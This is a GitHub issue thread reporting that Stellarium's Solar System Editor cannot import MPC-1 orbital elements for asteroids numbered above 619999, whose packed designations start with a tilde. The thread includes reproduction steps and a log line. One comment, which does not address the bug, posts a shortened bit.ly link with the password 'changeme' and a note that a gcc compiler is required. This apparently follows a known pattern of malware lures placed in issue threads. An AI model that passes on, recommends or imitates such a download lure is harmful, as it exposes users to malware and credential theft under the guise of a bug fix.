### ISSUE TITLE
SSE plugin: Asteroids above 619999 cannot be imported in MPC-1 liner format.

### ISSUE THREAD

**Issue by mizunyang** [Stellarium/stellarium#3882]
### Expected Behaviour
I would like to be able to import MPC-1 lines for minor planet that have been recently discovered and assigned Permanent Designations that begin with a tilde sign.
https://www.minorplanetcenter.net/iau/info/PackedDes.html

### Actual Behaviour
SSE does not seem to be able to import recently discovered minor planet.

### Steps to reproduce
1) MPC Website
Minor Planet & Comet Ephemeris Service
https://www.minorplanetcenter.net/iau/MPEph/MPEph.html
Enter 697402 in the object search text field
Select MPC-1 Line from the list of element output formats.
Click on the “Get ephemerides/HTML Page” button to download the file.

2) Stellarium 
Solor System Editor -> Import orbital elements in MPC format... 
Check the radio button “A file containing a list of object” and select the downloaded file.
Click on the “Get orbital elements" button. However, there is no response to the UI.
![image](https://github.com/user-attachments/assets/b8f5ad5a-8d60-4b16-938b-532ca99895ce)

3) Stellarium logfile
Log messages written in the “log file” section are recorded.

### System
* Stellarium version: stellarium-24.2-qt6-win64.exe
* Operating system: Microsoft Windows 11 Pro Version10.0.22631 Build 22631
* Graphics Card: NVIDIA RTX3060
* Screen type (if applicable):  2560 x 1440

### Logfile 
```
readMpcOneLineMinorPlanetElements(): "~0K8Q" is not a valid number or packed IAU designation
Done reading minor planet orbital elements. Recognized 0 candidate objects out of 1 lines.
```

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mizunyang** [comment]
Thank you for quickly responding to the issue.
I was able to confirm that the MPC import was successful with stellarium-24.2-2c2b03d-qt6-win64.exe.
